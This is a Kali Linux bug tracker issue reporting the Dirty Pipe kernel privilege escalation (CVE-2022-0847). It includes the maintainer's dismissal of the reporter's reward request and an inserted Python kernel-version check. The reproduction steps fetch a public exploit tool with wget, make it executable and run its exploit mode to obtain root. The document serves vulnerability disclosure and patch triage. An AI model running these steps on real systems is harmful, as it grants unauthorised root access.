View Issue Details

ID: 0007616
Project: Kali Linux
Category: General Bug
View Status: public
Last Update: 2022-03-12 09:10
Reporter: himanshu725
Assigned To: daniruiz
Priority: urgent
Severity: major
Reproducibility: always
Status: resolved
Resolution: fixed
Product Version: 2022.1
Fixed in Version: 2022.2
Summary0007616: Kali Linux all Versions is Vulnerable to CVE 2022-0847 | Direct Privilege Escalation
Description

CVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellermann, present in the Linux kernel itself since version 5.8, which allows overwriting data in arbitrary read-only files or, in simpler words, lets unprivileged processes inject code into privileged/root processes, thus escalating privilege. The original post with the full analysis and details can be found here: https://dirtypipe.cm4all.com/

Steps To Reproduce
  1. Log in as any normal user that does not have super user functionality
  2. Download an exploit from GitHub with the help of the wget utility
    wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
  3. Give all permissions to the downloaded file
    chmod 777 traitor-amd64
  4. Finally, execute it with
    ./traitor-amd64
    It gives you this type of output:
    [+] Assessing machine state...
    [+] Checking for opportunities...
    [+][kernel:CVE-2022-0847] Kernel version 5.15.0 is vulnerable!
  5. Now, at last, you need to exploit this vulnerability
    ./traitor-amd64 --exploit kernel:CVE-2022-0847
  6. BOOM!!!! You are now logged in as the ROOT user, without the root password. Do anything as the root user.
Additional Information

## Background of Vulnerability
Max came to know of the vulnerability after he tried to resolve unprecedented CRC errors in access logs. Many customers of cm4all.com were reporting that monthly access logs, even though downloadable, couldn't be decompressed and were throwing errors. Max explains in his post how he used the Z_SYNC_FLUSH mechanism along with splicing to concatenate daily log files into monthly ZIP archives made available for download over HTTP. Upon closer examination, he reached the root problem.

## Mitigations
The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.

## Reference
https://dirtypipe.cm4all.com/
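The Description and Mitigations sections above give the affected range (kernels since 5.8) and the stable releases that carry the fix (5.16.11, 5.15.25, 5.10.102). The following is an added example, not part of the report, that turns those numbers into a version-string check of the kind traitor performed in step 4; it assumes only that the fix landed in mainline 5.17 and later, which is true upstream.

```python
import platform
import re

# Stable branches and the first release of each that carries the fix,
# taken from the Mitigations section of the report.
FIXED_IN = {
    (5, 16): (5, 16, 11),
    (5, 15): (5, 15, 25),
    (5, 10): (5, 10, 102),
}
# The bug was introduced in 5.8 (Description section).
FIRST_AFFECTED = (5, 8, 0)
# Assumption (not stated on the page): mainline 5.17.0 and later ship with the fix.
FIRST_FIXED_MAINLINE = (5, 17, 0)


def parse_kernel_version(release):
    """Turn a `uname -r` string such as '5.15.0-kali3-amd64' into (major, minor, patch)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def assess_dirty_pipe(release):
    """Classify a kernel release as 'not affected', 'patched', 'vulnerable' or 'unknown'.

    The verdict is based on the upstream version number alone. Distribution
    kernels (e.g. Kali's 5.15.0-kali3 builds) may carry the fix as a backport
    without changing the patch level, so 'vulnerable' means "check further",
    not "confirmed exploitable".
    """
    ver = parse_kernel_version(release)
    if ver < FIRST_AFFECTED:
        return "not affected"
    if ver >= FIRST_FIXED_MAINLINE:
        return "patched"
    fixed = FIXED_IN.get(ver[:2])
    if fixed is None:
        # A 5.x branch between 5.8 and 5.16 that the report lists no fix for.
        return "unknown"
    return "patched" if ver >= fixed else "vulnerable"


if __name__ == "__main__":
    release = platform.release()
    print(f"{release}: {assess_dirty_pipe(release)}")
```

For a distribution kernel the version string is only a first triage signal; the package changelog (on Debian-based systems, `apt changelog linux-image-$(uname -r)`) is where the backported fix is actually recorded.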

Attached Files
POC_1.png (246,121 bytes)
POC_2.png (70,818 bytes)
POC_3.png (217,785 bytes)

Activities

daniruiz (manager)   2022-03-11 19:50   ~0015868

This is already fixed in the latest kernel version

himanshu725 (reporter)   2022-03-11 20:18   ~0015869

Thank you for your response.
But I reported it now; I reported this issue of Kali Linux versions first.
Latest versions take time.
That means you need to at least offer a monetary reward or hall of fame, or anything that encourages security researchers to report vulnerabilities in future.

Thanks,
Himanshu Sharma

himanshu725 (reporter)   2022-03-11 20:19   ~0015870

Thank you for your response.
But I reported it now; I reported this issue of Kali Linux versions first.
Latest versions take time.
That means you need to at least offer a monetary reward or hall of fame, or anything that encourages security researchers to report vulnerabilities in future.

Thanks,
Himanshu Sharma

daniruiz (manager)   2022-03-11 20:23   ~0015871

You reported a known issue that was already patched days ago and you expect a monetary reward? For using an automated script that you found online?
You have to be kidding.

Issue History

Date Modified Username Field Change
2022-03-11 19:45 himanshu725 New Issue
2022-03-11 19:45 himanshu725 File Added: POC_1.png
2022-03-11 19:45 himanshu725 File Added: POC_2.png
2022-03-11 19:45 himanshu725 File Added: POC_3.png
2022-03-11 19:50 daniruiz Note Added: 0015868
2022-03-11 19:50 daniruiz Assigned To => daniruiz
2022-03-11 19:50 daniruiz Status new => resolved
2022-03-11 19:50 daniruiz Resolution open => fixed
2022-03-11 19:50 daniruiz Fixed in Version => 2022.2
2022-03-11 20:18 himanshu725 Status resolved => feedback
2022-03-11 20:18 himanshu725 Resolution fixed => reopened
2022-03-11 20:18 himanshu725 Note Added: 0015869
2022-03-11 20:19 himanshu725 Note Added: 0015870
2022-03-11 20:19 himanshu725 Status feedback => assigned
2022-03-11 20:23 daniruiz Note Added: 0015871
2022-03-11 20:23 daniruiz Status assigned => resolved
2022-03-11 20:23 daniruiz Resolution reopened => fixed
2022-03-11 20:29 himanshu725 Status resolved => feedback
2022-03-11 20:29 himanshu725 Resolution fixed => reopened
2022-03-11 20:37 daniruiz Status feedback => resolved
2022-03-11 20:43 himanshu725 Status resolved => feedback
2022-03-12 09:10 daniruiz Status feedback => resolved
2022-03-12 09:10 daniruiz Resolution reopened => fixed